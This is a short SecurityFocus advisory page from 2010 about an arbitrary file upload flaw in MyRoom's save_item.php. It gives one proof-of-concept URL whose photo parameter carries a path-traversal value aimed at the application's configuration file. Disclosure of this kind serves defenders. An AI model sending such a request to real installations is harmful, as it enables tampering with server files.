info
discussion
exploit
solution
references
MyRoom save_item.php Arbitrary File Upload Vulnerability
The following proof of concept was provided:
http://www.example.org/room/save_item.php?name=[NAME]&ref=test&photo=../inc/conf.php&photo_type=ttxt
Privacy Statement
Copyright 2010, SecurityFocus
